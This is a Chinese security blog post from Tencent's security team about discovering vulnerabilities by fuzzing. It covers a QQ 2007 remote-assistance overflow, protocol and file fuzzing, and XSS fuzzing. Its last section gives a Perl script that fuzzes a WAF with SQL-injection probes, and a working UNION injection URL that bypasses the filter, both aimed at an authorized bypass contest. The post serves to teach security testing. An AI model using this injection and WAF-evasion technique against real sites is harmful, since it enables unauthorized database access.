En

Fuzz漏洞挖掘漫谈

作者:lake2[TSRC]公布时间:2013-11-12阅读次数:36201评论:8

分享

        在计算机领域,Fuzz Testing(模糊测试)是一种测试方法,即构造一系列无规则的“坏”数据插入应用程序,判断程序是否出现异常,以发现潜在的bug。在信息安全领域,也有人尝试引入fuzz testing思想进行安全漏洞挖掘,而且效果不错。

        大家可以看到,fuzz安全测试理论和应用都已经较为成熟,已有各种fuzz安全测试的框架、工具甚至书籍问世。

        初识fuzz的威力是在07年。当时来自team509安全团队的wushi发现了QQ的一个溢出漏洞,wushi本着“负责任的漏洞披露过程”将漏洞细节告知了腾讯安全团队。为此,腾讯还专门发布了一个安全公告(http://im.qq.com/safe/affiche/2007/20071015.shtml)。这应该是腾讯的第一个漏洞安全公告,奠定了腾讯未来的安全漏洞应急响应基础,具有划时代的意义。当然,这些都是另一个话题了。

        原来在当时的QQ 2007的远程协助模块在解包的过程中没有对传入的数据进行校验,结果就产生了溢出。如图所示就是发生堆溢出的汇编代码,我们可以看到memcpy函数三个参数外部均可以控制导致产生了堆溢出漏洞。攻击者可以构造特殊的数据包触发这个漏洞,wushi提供的PoC可以直接令远程协助的对方QQ崩溃。



 

        真是个威力巨大的漏洞!本着“知其然知其所以然”的原则,漏洞处理完后我们请教wushi是如何发现的,wushi只轻描淡写地说了一个英文单词——fuzz!

        从wushi的思路得到启发,腾讯安全团队也着手研究协议fuzz。

        为了迅速排查类似漏洞,我们先使用了Python脚本进行“小步快跑”式的协议fuzz。QQ支持HTTP代理,我们就用一个Python写的HTTP代理让测试QQ A通过这个代理与测试QQ B进行通信,这个Python代理就负责按照一定规则修改经过的指定格式的数据(也就是指定模型的fuzz啦)。果然,我们又在QQ 2007的远程协助、视频通话、音频通话模块中发现了数个远程溢出漏洞,均及时得以修复。

        使用HTTP代理只是权宜之计,因为不是所有的协议都支持HTTP代理,而且有些漏洞可能存在于原始协议中,于是我们又开发了一个基于Windows的协议fuzz程序。大致思路是通过DLL注入的方式hook某个进程调用的各个Socket发送函数,通过更改传输的数据进行fuzz。效果和Python殊途同归,但适用范围要大些。

        这种在原有协议上进行fuzz的好处在于可以“智能的”进行fuzz(smart fuzz),避免了大量的无用功。试想,如果协议不对数据包本身就被丢弃了,毫无规则的fuzz(blind fuzz)会浪费大量人力物力。当然,有些漏洞本身可能就会出现在不符合协议的数据处理中。如果时间允许,全fuzz也是有必要的。

        文件fuzz也是类似的思路。以JPG格式为例,只需要先找一些正常jpg文件做样本生成JPG模版,再对模版中的数据格式进行各种fuzz,生成fuzz样本,然后用程序逐个打开这些样本,看是否产生异常。

        类似的fuzz框架/工具也很多,如Sulley、PaiMei、TAOF,都很高端上流,有兴趣的同学自行百度之,在此不赘述。

        Web漏洞也是可以用fuzz思想来挖掘的。

        比如挖掘HTML5新特性的XSS攻击代码,最好的办法就是fuzz。先枚举浏览器支持的HTML5的各种属性方法,赋值之后观察是否alert。对一些类XSS Filter(Web Mail)的漏洞挖掘也是基于这种思路。

        前段时间安全宝搞了个绕过WAF的活动,我也体验了一把,用fuzz的方法发现一个绕过方法。

        我们都知道WAF是先于Web应用解析外部参数的,如果认为恶意就会拦截,但是WAF和Web应用如果对外部数据处理不一致就会存在绕过WAF的情况。要想绕过WAF,只需要找到WAF认为不是恶意但是又能对Web应用产生攻击的特殊字符串。

        当时我测试时安全宝的WAF时发现如果URL中含有“and”、“[空格]and[空格]”、“[TAB]and[TAB]”等都会被过滤(拦截的特征为HTTP 405),只要我能找到一个字符让WAF认为无问题,但是MySQL能知道是空格就好。

        怎么办?盲目猜是没有意义且低效的。那么就fuzz吧。把ASCII码1到255都穷举一遍看看。于是一个Perl脚本应运而生:


use LWP 5.64;
$browser = LWP::UserAgent->new;
for($i=0;$i<256;$i++){
	$j = data10to16($i);
	print "[+]  $j  ". hex($j) ."  ". chr(hex($j)) ." \n";
	$url = "http://secaqb.anquanbao.org/sqlin.php?id=9 and%".$j."1=1";
	$response = $browser->get($url);
	print "[-] code ".$response->status_line."\n";
	if($response->content=~/www\.cnseay\.com/is){ print "[$] done ! ========================>\n"; }
	sleep(1);
}
sub data10to16{
 my($data)=@_;
 my $data16=sprintf("x", $data); 
 return $data16;
}


        运行脚本然后喝一杯咖啡,然后看结果,果然发现ASCII码11的字符(URL编码)可以绕过安全宝WAF的拦截并且MySQL认为是代替空格的字符。如图。




        然后利用union查询时发现如果URL出现“1,1,1,1”字样也会被拦截,测试发现加几个空格就可以绕过。形式如“select 1, 1, 1, 1”。

        所以结合这两个bug,构造这样的URL就可以读取到数据库user为seay@localhost:http://secaqb.anquanbao.org/sqlin.php?id=9 and1=2 unionselect1,user(), 3 ,4

        看,这就是fuzz的威力。

        顺道提下,安全宝搞的WAF绕过活动应该收到很多bug,更新了很多绕过方法,这对于一个以安全技术为核心竞争力的产品来说实在是事半功倍。



评论留言

提交评论 您输入的漏洞名称有误,请重新输入